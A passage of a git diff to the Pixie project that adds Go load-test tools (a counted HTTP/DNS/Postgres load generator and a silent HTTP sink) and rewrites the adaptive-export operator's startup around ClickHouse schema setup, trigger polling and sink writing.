+ cl := &http.Client{Transport: tr, Timeout: 5 * time.Second}
+ url := "http://" + httpAddr + httpPath
+ resp, err := cl.Get(url)
+ if err != nil {
+ fatalf("http request %d/%d to %s failed: %v", i+1, httpN, url, err)
+ }
+ _, _ = io.Copy(io.Discard, resp.Body)
+ resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ fatalf("http request %d/%d to %s: status %d (need 2xx)", i+1, httpN, url, resp.StatusCode)
+ }
+ tr.CloseIdleConnections()
+ }
+
+ // ---- DNS: DNS_N distinct names, exactly one A query each ----
+ res := &net.Resolver{PreferGo: true}
+ for i := 0; i < dnsN; i++ {
+ name := fmt.Sprintf(dnsBase, i)
+ if !strings.HasSuffix(name, ".") {
+ fatalf("DNS_BASE must yield an FQDN ending in '.' to suppress search expansion; got %q", name)
+ }
+ ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+ // ip4 → a single A query. NXDOMAIN is fine: the query/response is still
+ // one captured dns_event. Any OTHER error (timeout) means the query may
+ // not have completed deterministically → fail the rep.
+ _, err := res.LookupNetIP(ctx, "ip4", name)
+ cancel()
+ if err != nil && !isNXDomain(err) {
+ fatalf("dns lookup %d/%d for %s failed non-NXDOMAIN: %v", i+1, dnsN, name, err)
+ }
+ }
+
+ // ---- PGSQL: PGSQL_N statements over one connection ----
+ if pgN > 0 {
+ host, port, _ := net.SplitHostPort(pgAddr)
+ dsn := fmt.Sprintf("host=%s port=%s user=%s password=%s dbname=%s sslmode=disable connect_timeout=5",
+ host, port,
+ envStr("PG_USER", "postgres"), envStr("PG_PASSWORD", "postgres"), envStr("PG_DB", "postgres"))
+ db, err := sql.Open("postgres", dsn)
+ if err != nil {
+ fatalf("pg open: %v", err)
+ }
+ db.SetMaxOpenConns(1)
+ db.SetMaxIdleConns(1)
+ for i := 0; i < pgN; i++ {
+ var one int
+ if err := db.QueryRow("SELECT 1").Scan(&one); err != nil {
+ fatalf("pg query %d/%d failed: %v", i+1, pgN, err)
+ }
+ }
+ db.Close()
+ }
+
+ b1 := time.Now()
+
+ m := manifest{
+ HTTP: httpN,
+ DNS: dnsN,
+ PGSQL: pgN,
+ ConnTCPEst: httpN + boolToInt(pgN > 0), // HTTP_N new conns + 1 pg conn
+ B0: b0.UnixNano(),
+ B1: b1.UnixNano(),
+ B0ISO: b0.UTC().Format(time.RFC3339Nano),
+ B1ISO: b1.UTC().Format(time.RFC3339Nano),
+ Pod: envStr("POD_NAME", os.Getenv("HOSTNAME")),
+ Namespace: envStr("POD_NAMESPACE", "aeload"),
+ Node: envStr("NODE_NAME", ""),
+ }
+ out, _ := json.Marshal(m)
+ fmt.Printf("AELOAD_MANIFEST %s\n", out)
+ fmt.Println("AELOAD_FIRED")
+
+ sig := make(chan os.Signal, 1)
+ signal.Notify(sig, syscall.SIGTERM, syscall.SIGINT)
+
+ // SUSTAIN: after the exact counted band, optionally keep a low continuous
+ // HTTP trickle for SUSTAIN_SEC. A FRESH pod's traffic is often missed because
+ // Pixie/Stirling's eBPF attaches to the new process only after a scan cycle —
+ // so a one-shot band fires before capture begins (the "0 for freshly-flagged
+ // pods" symptom). A trickle keeps the pod observable for the whole window, so
+ // Pixie captures it once attached. Used by the sustained / "does AE keep
+ // writing until t_end" RCA (E8-data). For exact-count tests (E5) leave
+ // SUSTAIN_SEC=0 and instead pre-warm via SETTLE_PRE_MS so Stirling is already
+ // attached when the exact band fires.
+ if sustainSec := envInt("SUSTAIN_SEC", 0); sustainSec > 0 {
+ deadline := time.Now().Add(time.Duration(sustainSec) * time.Second)
+ ticker := time.NewTicker(time.Second)
+ defer ticker.Stop()
+ // Trickle DISTINCT DNS lookups (one A-query each) — a protocol Pixie
+ // reliably traces — so every AE re-pull pass sees NEW rows and we can
+ // observe the C15 "keep writing until t_end" contract. (HTTP trickle was
+ // invisible on rigs where Pixie isn't tracing HTTP.)
+ sres := &net.Resolver{PreferGo: true}
+ si := dnsN
+ for time.Now().Before(deadline) {
+ select {
+ case <-sig:
+ return
+ case <-ticker.C:
+ sctx, scancel := context.WithTimeout(context.Background(), 3*time.Second)
+ _, _ = sres.LookupNetIP(sctx, "ip4", fmt.Sprintf(dnsBase, si))
+ scancel()
+ si++
+ }
+ }
+ }
+
+ // HOLD: keep the pod (and its upid) alive so Pixie metadata still resolves
+ // upid_to_pod_name when AE queries the window. Harness deletes us when done.
+ <-sig
+}
+
+func boolToInt(b bool) int {
+ if b {
+ return 1
+ }
+ return 0
+}
+
+// isNXDomain reports whether err is a "no such host" DNS error (the expected,
+// fully-deterministic outcome for synthetic names) rather than a transport
+// failure that would make the query count non-deterministic.
+func isNXDomain(err error) bool {
+ var de *net.DNSError
+ if errors.As(err, &de) {
+ return de.IsNotFound
+ }
+ return false
+}
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go
new file mode 100644
index 00000000000..efe076af467
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go
@@ -0,0 +1,30 @@
+// httpsink — a minimal HTTP server for the AE load-test data plane.
+//
+// It exists only to terminate cleanloadgen's counted HTTP requests with a 200
+// and zero side effects. No logging, no metrics endpoint, no readiness/liveness
+// surface — anything extra would be captured by Pixie and pollute the per-pod
+// http_events / conn_stats counts on the sink side. (AE filters to the client
+// pod, so the sink's rows are excluded anyway, but keeping it silent removes any
+// chance of cross-talk.)
+package main
+
+import (
+ "net/http"
+ "os"
+)
+
+func main() {
+ addr := ":8080"
+ if v := os.Getenv("LISTEN_ADDR"); v != "" {
+ addr = v
+ }
+ mux := http.NewServeMux()
+ mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+ w.WriteHeader(http.StatusOK)
+ _, _ = w.Write([]byte("ok\n"))
+ })
+ srv := &http.Server{Addr: addr, Handler: mux}
+ if err := srv.ListenAndServe(); err != nil {
+ panic(err)
+ }
+}
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod
new file mode 100644
index 00000000000..4ad12205416
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod
@@ -0,0 +1,5 @@
+module aeload
+
+go 1.22
+
+require github.com/lib/pq v1.10.9
diff --git a/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel b/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel
index bcb150a2802..38fa4950c16 100644
--- a/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel
+++ b/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel
@@ -24,29 +24,29 @@ package(default_visibility = [
# Generate all Go container library permutations for supported Go versions.
go_container_libraries(
- container_type = "grpc_server",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "grpc_server",
prebuilt_container_versions = pl_go_test_versions,
)
# Stirling test cases usually test server side tracing. Therefore
# we only need to provide the bazel SDK versions for the client containers.
go_container_libraries(
- container_type = "grpc_client",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "grpc_client",
)
go_container_libraries(
- container_type = "tls_server",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "tls_server",
prebuilt_container_versions = pl_go_test_versions,
)
# Stirling test cases usually test server side tracing. Therefore
# we only need to provide the bazel SDK versions for the client containers.
go_container_libraries(
- container_type = "tls_client",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "tls_client",
)
pl_cc_test_library(
diff --git a/src/vizier/services/adaptive_export/BUILD.bazel b/src/vizier/services/adaptive_export/BUILD.bazel
index 38773121091..b352fa213f6 100644
--- a/src/vizier/services/adaptive_export/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/BUILD.bazel
@@ -14,6 +14,8 @@
#
# SPDX-License-Identifier: Apache-2.0
+load("@io_bazel_rules_docker//container:container.bzl", "container_bundle")
+load("@io_bazel_rules_docker//contrib:push-all.bzl", "container_push")
load("//bazel:pl_build_system.bzl", "pl_go_image")
pl_go_image(
@@ -24,3 +26,27 @@ pl_go_image(
"//src/vizier:__subpackages__",
],
)
+
+# Single-image bundle + push targets — same shape as
+# //k8s/vizier:image_bundle / vizier_images_push, but scoped to ONLY
+# the adaptive_export image so the SBOB PoC can rebuild this one
+# component without rebuilding kelvin / pem / metadata. Consumed by
+# .github/workflows/adaptive_export_image.yaml via
+# `bazel run :adaptive_export_image_push` with the standard
+# --//k8s:image_repository / --//k8s:image_version overrides.
+container_bundle(
+ name = "adaptive_export_image_bundle",
+ images = {
+ "$(IMAGE_PREFIX)/vizier-adaptive_export_image:$(BUNDLE_VERSION)": ":adaptive_export_image",
+ },
+ toolchains = [
+ "//k8s:image_prefix",
+ "//k8s:bundle_version",
+ ],
+)
+
+container_push(
+ name = "adaptive_export_image_push",
+ bundle = ":adaptive_export_image_bundle",
+ format = "Docker",
+)
diff --git a/src/vizier/services/adaptive_export/cmd/BUILD.bazel b/src/vizier/services/adaptive_export/cmd/BUILD.bazel
index e5cc4fe7423..1ebaf3c27cd 100644
--- a/src/vizier/services/adaptive_export/cmd/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/cmd/BUILD.bazel
@@ -24,10 +24,21 @@ go_library(
visibility = ["//visibility:private"],
deps = [
"//src/api/go/pxapi",
+ "//src/shared/services",
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
"//src/vizier/services/adaptive_export/internal/config",
+ "//src/vizier/services/adaptive_export/internal/control",
+ "//src/vizier/services/adaptive_export/internal/controller",
+ "//src/vizier/services/adaptive_export/internal/passthrough",
"//src/vizier/services/adaptive_export/internal/pixie",
+ "//src/vizier/services/adaptive_export/internal/pixieapi",
"//src/vizier/services/adaptive_export/internal/pxl",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
"//src/vizier/services/adaptive_export/internal/script",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ "//src/vizier/services/adaptive_export/internal/streaming",
+ "//src/vizier/services/adaptive_export/internal/trigger",
"@com_github_sirupsen_logrus//:logrus",
],
)
diff --git a/src/vizier/services/adaptive_export/cmd/main.go b/src/vizier/services/adaptive_export/cmd/main.go
index 10d178f6b3f..7cb5ae6d1ee 100644
--- a/src/vizier/services/adaptive_export/cmd/main.go
+++ b/src/vizier/services/adaptive_export/cmd/main.go
@@ -14,394 +14,876 @@
//
// SPDX-License-Identifier: Apache-2.0
+// Adaptive-export operator (push flow, design rev 2).
+//
+// Lifecycle (one pod per node, deployed as a DaemonSet):
+//
+// 1. boot:
+// - load config (env + k8s downward API for NODE_NAME)
+// - ensure ClickHouse retention plugin is enabled (idempotent;
+// retention scripts themselves are user-defined in the Pixie UI)
+// - rehydrate the in-memory active set from
+// forensic_db.adaptive_attribution FINAL WHERE hostname=
+// - start the trigger + controller
+//
+// 2. steady state:
+// - trigger polls forensic_db.kubescape_logs WHERE hostname=
+// - controller derives anomaly hash from each event and writes a
+// forensic_db.adaptive_attribution row (one INSERT per event;
+// ReplacingMergeTree(t_end) collapses re-inserts to the latest
+// end_time, extending the active window)
+//
+// 3. shutdown:
+// - on SIGINT/SIGTERM, cancel context, drain.
package main
import (
"context"
"fmt"
+ "net/http"
+ _ "net/http/pprof" // /debug/pprof/* on the debug-only listener (gated by AE_PPROF_ADDR; not in release builds otherwise unused)
"os"
"os/signal"
+ "strconv"
"strings"
+ "sync"
"syscall"
"time"
log "github.com/sirupsen/logrus"
"px.dev/pixie/src/api/go/pxapi"
+ "px.dev/pixie/src/shared/services"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/config"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/control"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/script"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
)
const (
- defaultRetries = 100
- defaultSleepTime = 15 * time.Second
- schemaCreationInterval = 2 * time.Minute
- setupTimeout = 30 * time.Second
- scriptExecutionTimeout = 60 * time.Second
-)
-
-const (
- schemaCreationScriptTmpl = `
-import px
-px.display(px.CreateClickHouseSchemas(
- host="%s",
- port=%s,
- username="%s",
- password="%s",
- database="%s"
-))
-`
- detectionScriptTmpl = `
-import px
-
-df = px.DataFrame('%s', clickhouse_dsn='%s', start_time='-%ds')
-df.alert = df.message
-df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace")
-df.podName = px.pluck(df.RuntimeK8sDetails, "podName")
-df.time_ = px.int64_to_time(df.event_time * 1000000000)
-df = df[['time_', 'alert', 'namespace', 'podName']]
-px.display(df)
-`
+ // envCHHTTPEndpoint overrides the ClickHouse HTTP endpoint used by
+ // both the trigger (poll kubescape_logs) and the sink (write
+ // adaptive_attribution). Defaults to http://:8123.
+ envCHHTTPEndpoint = "FORENSIC_CH_HTTP_ENDPOINT"
+
+ // envNodeName is the k8s downward API var the DaemonSet sets via
+ // `valueFrom: fieldRef: spec.nodeName`. Falls back to os.Hostname().
+ envNodeName = "NODE_NAME"
+
+ // envWindowBeforeSec / envWindowAfterSec / envTriggerPollMS /
+ // envPruneIntervalSec are programmatic overrides per the spec.
+ envWindowBeforeSec = "ADAPTIVE_WINDOW_BEFORE_SEC"
+ envWindowAfterSec = "ADAPTIVE_WINDOW_AFTER_SEC"
+ envTriggerPollMS = "ADAPTIVE_TRIGGER_POLL_MS"
+ envPruneIntervalSec = "ADAPTIVE_PRUNE_INTERVAL_SEC"
+
+ // envPushRefreshSec overrides controller.PushRefreshInterval. Unset →
+ // 30s default. A NEGATIVE value selects single-shot mode (one pull per
+ // anomaly window), which the load-test harness uses so the non-deduping
+ // MergeTree protocol tables get each window exactly once.
+ envPushRefreshSec = "ADAPTIVE_PUSH_REFRESH_SEC"
+
+ // envTriggerHTTPTimeoutSec — per-poll HTTP budget (default 30s).
+ // The pre-watermark 5s default timed out every catch-up SELECT.
+ envTriggerHTTPTimeoutSec = "ADAPTIVE_TRIGGER_HTTP_TIMEOUT_SEC"
+
+ // envTriggerPollLimit — max rows fetched per poll (default 10000).
+ // Bounds catch-up work after a restart so an N-hour backlog
+ // drains in ceil(N/PollLimit) polls instead of one giant scan.
+ envTriggerPollLimit = "ADAPTIVE_TRIGGER_POLL_LIMIT"
+
+ // envWatermarkSaveSec — minimum interval between persistent
+ // watermark INSERTs (default 5s). The in-memory watermark
+ // advances every successful poll; flush is throttled.
+ envWatermarkSaveSec = "ADAPTIVE_WATERMARK_SAVE_SEC"
+
+ // envSkipApply lets a deployment opt out of in-process DDL when
+ // the schema has been pre-applied by a separate Job (recommended
+ // production split: high-priv Job for CREATE TABLE / ALTER, then
+ // the operator runs with INSERT-only creds and skips Apply).
+ // VerifyPixieSchema still runs and refuses to start on drift.
+ envSkipApply = "ADAPTIVE_SKIP_APPLY"
+
+ // envInstallPresets makes the operator boot install Pixie's preset
+ // retention scripts on this cluster. One-shot, idempotent (script-name
+ // match → skip). Defaults to false because the production design has
+ // users author scripts in the Pixie UI.
+ envInstallPresets = "INSTALL_PRESET_SCRIPTS"
+
+ // === Throughput-protection knobs for the pushPixieRows fan-out.
+ // All default to 0 (= legacy unbounded behavior preserved).
+ envMaxParallelQueriesPerHash = "ADAPTIVE_MAX_PARALLEL_QUERIES_PER_HASH"
+ envMaxInflightQueriesGlobal = "ADAPTIVE_MAX_INFLIGHT_QUERIES_GLOBAL"
+ envEmptyResultSkipAfterN = "ADAPTIVE_EMPTY_RESULT_SKIP_AFTER_N"
+ envEmptyResultSkipTTLSec = "ADAPTIVE_EMPTY_RESULT_SKIP_TTL_SEC"
+
+ // envPushPixieTables — when true, the operator queries vizier
+ // directly via pxapi on each fresh anomaly and writes the resulting
+ // rows to forensic_db. (rev-1 path). Required when the
+ // cloud's retention plugin can't reach the in-cluster CH (e.g.
+ // AOCC pixie cloud + CH ClusterIP service).
+ envPushPixieTables = "ADAPTIVE_PUSH_PIXIE_ROWS"
+
+ // envAdaptiveWriteMode selects the protocol-table write path:
+ // "pull" → rev-2: per-hash×per-table fan-out (default)
+ // "streaming" → rev-3: N TableScanners with shared allowlist
+ // (see .local/adaptive-write-rev3-plan.md)
+ envAdaptiveWriteMode = "ADAPTIVE_WRITE_MODE"
+
+ // envPassthrough — firehose mode counterpart to the anomaly-gated
+ // path. When "true", a single background loop queries every pixie
+ // observation table with an empty Target (no ns/pod predicate),
+ // over the rolling window, and writes the result via the existing
+ // sink. Enables A/B measurement of AE's capture fraction by
+ // running the same workload+window twice with the env flipped.
+ envPassthrough = "ADAPTIVE_PASSTHROUGH"
+ envPassthroughWindow = "ADAPTIVE_PASSTHROUGH_WINDOW_SEC"
+ envPassthroughRefresh = "ADAPTIVE_PASSTHROUGH_REFRESH_SEC"
+ // envPassthroughCompiled — selects the firehose query path. Default
+ // ON: per-table PxL is precompiled once and all tables are pulled
+ // concurrently per tick. Set to "false" to revert to the legacy path
+ // (QueryFor rebuilt per tick, tables walked serially).
+ envPassthroughCompiled = "ADAPTIVE_PASSTHROUGH_COMPILED"
+
+ // envReconcile — per-pull write-fidelity instrument. When "true",
+ // every data-plane pull (filter / passthrough / streaming) records
+ // one forensic_db.ae_reconcile row (read_count vs wrote_count, window,
+ // pod) so a reconcile run can localize loss to query (R5) vs sink (R6).
+ // Off by default; the recorder is reconcile.Nop{} unless set.
+ envReconcile = "ADAPTIVE_RECONCILE"
)
-func renderSchemaScript(cfg config.ClickHouse) string {
- return fmt.Sprintf(schemaCreationScriptTmpl,
- cfg.Host(), cfg.Port(), cfg.User(), cfg.Password(), cfg.Database())
-}
-
-func renderDetectionScript(cfg config.ClickHouse, lookback int64) string {
- return fmt.Sprintf(detectionScriptTmpl, cfg.Table(), cfg.DSN(), lookback)
-}
-
func main() {
+ // Wire AE into the shared pixie service scaffold:
+ // - SetupService registers --version + ports.
+ // - SetupSSLClientFlags adds the client TLS flags pxapi uses
+ // when --disable_ssl=false (cluster TLS into vizier).
+ // - PostFlagSetupAndParse runs pflag.Parse and binds viper to
+ // PL_*-prefixed env vars (so PL_JWT_SIGNING_KEY etc. work
+ // without any custom os.Getenv plumbing).
+ // - SetupServiceLogging switches logrus to JSON for log shippers.
+ // AE doesn't run a gRPC server, so CheckServiceFlags is skipped —
+ // it panics on missing --server_tls_key/cert which AE has no use
+ // for.
+ services.SetupService("adaptive-export", 50900)
+ services.SetupSSLClientFlags()
+ services.PostFlagSetupAndParse()
+ services.SetupServiceLogging()
+
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
- log.Info("Starting the ClickHouse Adaptive Export service")
+ // Debug pprof listener — gated on AE_PPROF_ADDR (e.g. "127.0.0.1:6060").
+ // Off by default; when set, /debug/pprof/* on that addr exposes the
+ // runtime profiles for live CPU / heap / goroutine investigations. The
+ // blank-import of net/http/pprof above registers the handlers on the
+ // DefaultServeMux. Bind loopback in containers unless you port-forward.
+ if addr := os.Getenv("AE_PPROF_ADDR"); addr != "" {
+ go func() {
+ log.WithField("addr", addr).Info("pprof listening (/debug/pprof/*)")
+ if err := http.ListenAndServe(addr, nil); err != nil &&
+ err != http.ErrServerClosed {
+ log.WithError(err).Error("pprof listener stopped")
+ }
+ }()
+ }
+
+ log.Info("starting adaptive-export operator (push flow, rev 2)")
cfg, err := config.GetConfig()
if err != nil {
log.WithError(err).Fatal("failed to load configuration")
}
- clusterID := cfg.Pixie().ClusterID()
- clusterName := cfg.Worker().ClusterName()
-
- // Setup Pixie Plugin API client
- log.Infof("Setting up Pixie plugin API client for cluster-id %s", clusterID)
- pluginClient, err := setupPixie(ctx, cfg.Pixie(), defaultRetries, defaultSleepTime)
+ hostname, err := resolveHostname()
if err != nil {
- log.WithError(err).Fatal("setting up Pixie plugin client failed")
+ log.WithError(err).Fatal("failed to resolve node identity — set NODE_NAME via k8s downward API (spec.nodeName)")
}
+ log.WithField("hostname", hostname).Info("operator pod is node-local")
+
+ chEndpoint := chHTTPEndpoint(cfg.ClickHouse().Host(), os.Getenv(envCHHTTPEndpoint))
+ log.WithField("endpoint", chEndpoint).Info("clickhouse HTTP endpoint resolved")
- // Setup Pixie pxapi client for executing PxL scripts
- log.Info("Setting up Pixie pxapi client")
- // Use parent context - client stores this and uses it for all subsequent operations
- pxClient, err := pxapi.NewClient(ctx, pxapi.WithAPIKey(cfg.Pixie().APIKey()), pxapi.WithCloudAddr(cfg.Pixie().Host()))
+ // 1. Apply operator-owned DDL FIRST, before Pixie's retention plugin
+ // has a chance to auto-create pixie tables with its minimal
+ // column set (no namespace / pod). The kubescape tables
+ // (alerts, kubescape_logs) are owned by the soc installer and
+ // are NOT touched here.
+ applier, err := clickhouse.NewApplier(chEndpoint, cfg.ClickHouse().User(), cfg.ClickHouse().Password())
if err != nil {
- log.WithError(err).Fatal("failed to create pxapi client")
- }
-
- // Start schema creation background task. This drives
- // px.CreateClickHouseSchemas, which issues CREATE TABLE IF NOT EXISTS
- // for every Pixie stirling table the metadata service knows about. In
- // labs where ClickHouse users don't have DDL rights (e.g. soc's
- // ingest_writer with allow_ddl=0), the CREATE silently fails and only
- // tables pre-created by external schema.sql work. Off by default to
- // avoid noisy server logs; opt-in via env when you want Pixie's
- // automatic schema bootstrap.
- if strings.EqualFold(os.Getenv("ENABLE_SCHEMA_CREATION"), "true") {
- log.Info("ENABLE_SCHEMA_CREATION=true — starting schema creation task")
- go runSchemaCreationTask(ctx, pxClient, clusterID, cfg.ClickHouse())
+ log.WithError(err).Fatal("failed to construct schema applier")
+ }
+ if strings.EqualFold(os.Getenv(envSkipApply), "true") {
+ log.Info("ADAPTIVE_SKIP_APPLY=true — schema apply skipped; expecting an out-of-band DDL Job to have created the tables")
} else {
- log.Info("Schema creation task disabled (set ENABLE_SCHEMA_CREATION=true to opt in)")
+ if err := applier.Apply(ctx); err != nil {
+ log.WithError(err).Fatal("schema apply failed; refusing to proceed with possibly drifted tables")
+ }
+ log.WithField("tables", clickhouse.OperatorOwnedTables).Info("operator-owned DDL applied")
}
- // Start detection + reconcile loop that turns the retention plugin on/off
- go runDetectionTask(ctx, pxClient, pluginClient, cfg, clusterID, clusterName)
-
- // Wait for signal to shutdown
- sigCh := make(chan os.Signal, 1)
- signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
- <-sigCh
-
- log.Info("Shutting down adaptive export service")
- cancel()
- time.Sleep(1 * time.Second)
-}
+ // 2. Defensive guard against Pixie's retention plugin having
+ // auto-created any pixie table BEFORE our Apply ran (e.g. a
+ // pre-existing cluster install). Refuse to start if drift
+ // detected so the misconfig is loud, not silent.
+ if err := applier.VerifyPixieSchema(ctx); err != nil {
+ log.WithError(err).Fatal("pixie table schema drift detected — pre-existing tables are missing operator-required columns; drop and re-create OR ALTER TABLE ADD COLUMN before retrying")
+ }
+ log.Info("pixie table schemas verified — namespace + pod columns present on all 12 tables")
+
+ // 3. Best-effort: ensure the Pixie ClickHouse retention plugin is
+ // enabled. The retention scripts themselves are defined by the
+ // user via the Pixie UI — we don't manage them. The cloud client
+ // is OPTIONAL — direct-mode query (set up in step 5) does not
+ // need it, so a cloud-side outage must not block the operator
+ // from starting. Downgrade the failure to a warning and skip the
+ // plugin/preset steps that depend on this client.
+ pluginClient, err := pixie.NewClient(ctx, cfg.Pixie().APIKey(), cfg.Pixie().Host())
+ if err != nil {
+ log.WithError(err).Warn("could not create pixie cloud plugin client — skipping plugin enablement and preset install; pixie tables will stay empty until the user enables the plugin in the Pixie UI")
+ pluginClient = nil
+ }
+ if pluginClient != nil {
+ chDSN := cfg.ClickHouse().DSN()
+ exportURL, err := pluginClient.EnsureClickHousePluginEnabled(chDSN)
+ if err != nil {
+ // non-fatal — the operator's own write path doesn't depend on
+ // the plugin; analyst joins against pixie-table rows do, but a
+ // missing plugin is a deployment misconfiguration the user
+ // surfaces via UI.
+ log.WithError(err).Warn("could not ensure ClickHouse plugin is enabled — pixie tables will not be populated until you turn it on in the Pixie UI")
+ } else {
+ log.WithField("export_url", exportURL).Info("clickhouse retention plugin is enabled")
+ }
-func runSchemaCreationTask(ctx context.Context, client *pxapi.Client, clusterID string, chCfg config.ClickHouse) {
- ticker := time.NewTicker(schemaCreationInterval)
- defer ticker.Stop()
-
- runOnce := func() {
- log.Info("Running schema creation script")
- execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout)
- defer cancel()
- if _, err := pxl.ExecuteScript(execCtx, client, clusterID, renderSchemaScript(chCfg)); err != nil {
- log.WithError(err).Error("failed to execute schema creation script")
- return
+ // 3b. (optional) install Pixie's preset retention scripts so the
+ // pixie observation tables actually receive rows. Without this,
+ // the plugin is enabled but does nothing.
+ if strings.EqualFold(os.Getenv(envInstallPresets), "true") {
+ installed, err := installPresetScripts(pluginClient, cfg.Pixie().ClusterID(), cfg.Worker().ClusterName())
+ if err != nil {
+ log.WithError(err).Warn("INSTALL_PRESET_SCRIPTS=true but install failed — pixie tables will stay empty")
+ } else {
+ log.WithField("installed", installed).Info("preset retention scripts installed on cluster")
+ }
}
- log.Info("Schema creation script completed successfully")
}
- runOnce()
- for {
- select {
- case <-ctx.Done():
- log.Info("Schema creation task shutting down")
- return
- case <-ticker.C:
- runOnce()
- }
+ // 4. Build trigger + sink + controller.
+ pollInterval := durEnv(envTriggerPollMS, 250*time.Millisecond, time.Millisecond)
+ httpTimeout := durEnv(envTriggerHTTPTimeoutSec, 30*time.Second, time.Second)
+ saveInterval := durEnv(envWatermarkSaveSec, 5*time.Second, time.Second)
+ pollLimit := intEnv(envTriggerPollLimit, 10000)
+ // Persistent watermark store keeps the trigger's kubescape_logs
+ // cursor in forensic_db.trigger_watermark, so a restart on a busy
+ // node doesn't replay the full table from event_time=0 (which
+ // timed out every single HTTP read and pinned the watermark at 0
+ // forever — the failure mode that produced "AE silent for 10h
+ // after OOM-restart" in the field).
+ wmStore, err := trigger.NewClickHouseWatermarkStore(
+ chEndpoint, cfg.ClickHouse().Database(),
+ cfg.ClickHouse().User(), cfg.ClickHouse().Password(),
+ httpTimeout)
+ if err != nil {
+ log.WithError(err).Fatal("failed to create persistent watermark store")
+ }
+ trg, err := trigger.New(trigger.Config{
+ Endpoint: chEndpoint,
+ Database: cfg.ClickHouse().Database(),
+ Table: cfg.ClickHouse().Table(),
+ Username: cfg.ClickHouse().User(),
+ Password: cfg.ClickHouse().Password(),
+ Hostname: hostname,
+ PollInterval: pollInterval,
+ Watermark: wmStore,
+ WatermarkSaveInterval: saveInterval,
+ PollLimit: pollLimit,
+ HTTPTimeout: httpTimeout,
+ })
+ if err != nil {
+ log.WithError(err).Fatal("failed to create trigger")
+ }
+
+ snk, err := sink.New(sink.Config{
+ Endpoint: chEndpoint,
+ Database: cfg.ClickHouse().Database(),
+ Username: cfg.ClickHouse().User(),
+ Password: cfg.ClickHouse().Password(),
+ })
+ if err != nil {
+ log.WithError(err).Fatal("failed to create sink")
}
-}
-func runDetectionTask(ctx context.Context, pxClient *pxapi.Client, pluginClient *pixie.Client, cfg config.Config, clusterID string, clusterName string) {
- detectionInterval := time.Duration(cfg.Worker().DetectionInterval()) * time.Second
- detectionLookback := cfg.Worker().DetectionLookback()
- quietTicks := cfg.Worker().ExportQuietTicks()
- mode := cfg.Worker().ExportMode()
+ // Per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). When on,
+ // the CH-backed sink IS the Recorder; otherwise a Nop drops every row.
+ // Shared by the controller fan-out, passthrough, and streaming paths.
+ var rec reconcile.Recorder = reconcile.Nop{}
+ if strings.EqualFold(os.Getenv(envReconcile), "true") {
+ rec = snk
+ log.Info("ADAPTIVE_RECONCILE=true — per-pull read/wrote counts → forensic_db.ae_reconcile")
+ }
- ticker := time.NewTicker(detectionInterval)
- defer ticker.Stop()
+ // Mode selection:
+ // "streaming" → rev-3: leave PushPixieTables EMPTY (so the
+ // controller skips fan-out) and stand up the
+ // streaming.Supervisor instead.
+ // else → rev-2: per-hash×per-table fan-out (legacy).
+ streamingMode := strings.EqualFold(os.Getenv(envAdaptiveWriteMode), "streaming")
+ pushPixieRequested := strings.EqualFold(os.Getenv(envPushPixieTables), "true")
+ if streamingMode && pushPixieRequested {
+ log.Info("ADAPTIVE_WRITE_MODE=streaming overrides ADAPTIVE_PUSH_PIXIE_ROWS — fan-out disabled, streaming.Supervisor will own protocol-table writes")
+ }
- // pluginEnabled tracks our last-known retention-plugin state. A nil value means
- // we haven't reconciled yet; we always query on the first tick.
- var pluginEnabled *bool
- quietStreak := int64(0)
+ // Shared ActiveSet (used only by streaming mode; harmless in pull mode).
+ activeSet := activeset.New()
+ // AttributionNotifier — non-blocking shim so the controller's
+ // synchronous OnAttribution / OnPrune callbacks don't pin
+ // controller.handle on slow ActiveSet writes. Tests in
+ // streaming/notifier_test.go cover the buffer-overflow + drop
+ // semantics. The Run goroutine is started below in streaming mode.
+ attrNotifier := streaming.NewAttributionNotifier(activeSet, streaming.NotifierConfig{
+ BufferSize: intEnvOrZero("ADAPTIVE_STREAM_NOTIFIER_BUFFER"),
+ })
